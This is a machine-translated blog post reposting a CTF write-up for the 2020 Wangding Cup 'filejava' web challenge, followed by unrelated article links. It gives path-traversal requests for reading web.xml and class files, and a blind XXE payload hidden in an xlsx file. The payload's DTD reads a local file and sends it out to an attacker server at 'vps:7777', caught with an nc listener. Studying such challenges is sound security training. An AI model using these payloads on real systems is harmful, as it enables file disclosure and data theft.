[WANGDING cup 2020 Qinglong group]
Sk1y 2022-01-26 12:22:55 阅读数:353
wangding
cup
qinglong
group
[ WANGDING cup 2020 Qinglong formation ]filejava
List of articles
Knowledge point :web.xml Document leakage , blind xxe
The problem solving process
Open the container , We need to upload files
First upload a file , Capture packets when downloading
Get download path , You can try to read web.xml
/DownloadServlet?filename=../../../web.xml
perhaps
/DownloadServlet?filename=../../../../../../../../../usr/local/tomcat/webapps/ROOT/WEB-INF/web.xml
Then go and download all these things
DownloadServlet?filename=../../../../../../../../../usr/local/tomcat/webapps/ROOT/WEB-INF/classes/cn/abc/servlet/DownloadServlet.class
DownloadServlet?filename=../../../../../../../../../usr/local/tomcat/webapps/ROOT/WEB-INF/classes/cn/abc/servlet/ListFileServlet.class
DownloadServlet?filename=../../../../../../../../../usr/local/tomcat/webapps/ROOT/WEB-INF/classes/cn/abc/servlet/UploadServlet.class
And then use jd-jui Tools for decompilation , Tools download link :Free Download JD-GUI for Windows Latest Version (apponic.com)
Pay attention to the key points ,excel and xxe A combination of vulnerabilities ,CVE-2014-3529
Create a new name for excel-sk1y.xlsx file , Unzip it
And then modify [Content_Types].xml, Add... On its second line
<!DOCTYPE convert [ <!ENTITY % remote SYSTEM "http://vps/file.dtd"> %remote;%int;%send; ]>
Then compress it into excel-sk1y.xlsx
among vps For personal public network server ip, The effect is
stay vps Upper web root directory ( It's usually /var/www/html/) Add file.dtd file , The content is
<!ENTITY % file SYSTEM "file:///flag">
<!ENTITY % int "<!ENTITY % send SYSTEM 'http://vps:7777?p=%file;'>">
monitor vps Of 7777 port ,
nc -lvp 7777
Then upload the excel-sk1y.xlsx, have to flag
Reference link
copyright:author[Sk1y],Please bring the original link to reprint, thank you. https://en.javamana.com/2022/01/202201261222535413.html
- After learning Java, I'm going to write a program today. Let me have a look
- "Learn and forget" Linux system management - 83. Viewing processes in Linux (top command)
- Spring injection problem
- Structured bridging mode design player (detailed introduction & java code example)
- URL & HTTP message & World Wide Web
- Hadoop / HDFS / Yan in the interview of big data
- Java exercises, may be a cycle, the third, let me see
- Linux shell string
- Spring framework learning - annotation based container configuration for spring IOC
- Data structure analysis of Java class object model: classloader and modifier
- Graphic explanation of Java virtual machine: the JVM architecture explained
- Detailed explanation of Java generic wildcards
- When the query result of yyds dry goods count and jdbctemplate is map, it should be handled with caution
- Yyds dry goods inventory talking about MySQL transaction and mvcc
- 2021 gold, silver and four spring moves are necessary. You have to look at the real interview questions of Java manufacturers to stay up late, so as to ensure that you get a soft hand in your offer
- [basic java learning] 03. The difference between string and StringBuilder
- Take you through the 9.8-minute masterpiece effective Java -- Enumeration & annotation
- Using java to operate redis
- Redis sentinel mode
- Three special data types and common commands in redis
- Installing MySQL under Linux system
- Installing Tomcat under Linux system
- Common commands for Linux
- Yyds dry goods inventory Linux command -- RM, rmdir, MV
- Yyds dry goods inventory web security day29: remote backup of Linux logs
- Install clion2021, adopt a new set of embedded software development kit, and complete the program of STM32F103 lighting LED
- [data structure] genealogy system based on binary tree
- init datasource error, url: jdbc: mysql://localhost:3306/test terms of settlement
- Shiro custom exception cannot be caught. Always throw authenticationexception solution
- MySQL queries duplicate data and only keeps the latest one
- Springboot loop dependency
- Spring boot integration swagger tutorial
- MV command of Linux
- Boot integration spring Shiro
- Interview question 2 (Java Basics) 20 to 40
- Detailed explanation of mybatis cache mechanism # yyds dry goods inventory #
- Spring framework source code dry goods sharing three-level cache and parent-child factory
- Dl4j practice 4: Classic convolution example (GPU version), the best Java Tutorial
- Sorting 100000 data takes only 2 seconds, and Java helps you achieve it
- Flink on Yan trilogy III: submit Flink task, java tutorial, baidu cloud latest version
- Spring boot redirect URL is out of order
- Hive actual combat UDF external dependency file cannot be found
- JQuery of Vue project removed by one click
- Java collection iterator
- What are the various Java software development tools?
- Installing docker for Ubuntu
- Java - new Java (note)
- New features of Java 8: stream API, interview questions for Java full stack engineers
- InnoDB (2) has been developing Java for 6 years
- Hive JDBC operation, redis downtime and data loss solution
- Harmonyos (Hongmeng), Java introduction to proficient electronic version
- "Anti corruption storm 5: final chapter" theme song MV Gu Tianle bid farewell to Lu Zhilian
- Multithreading in Java: thread use, thread safety, Java compilation principle pdf
- Custom orm of 30 classes handwritten spring core principles (Part 1) (6)
- Is java "pass reference" or "pass value"?
- Installing spark + Hadoop under Windows
- C how to use HTTPS proxy to request web pages
- Naming conventions for java development
- Basic modules of Kafka broker
- Interview question on Java collection: compare ArrayList and vector objects to analyze why vector is not commonly used